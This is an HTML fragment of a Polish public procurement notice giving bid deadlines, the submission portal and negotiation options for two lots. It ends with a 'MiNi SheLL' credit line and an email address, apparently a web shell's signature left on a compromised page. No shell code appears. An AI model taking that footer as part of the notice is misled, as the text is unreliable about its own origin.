Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-15 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-10-14</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com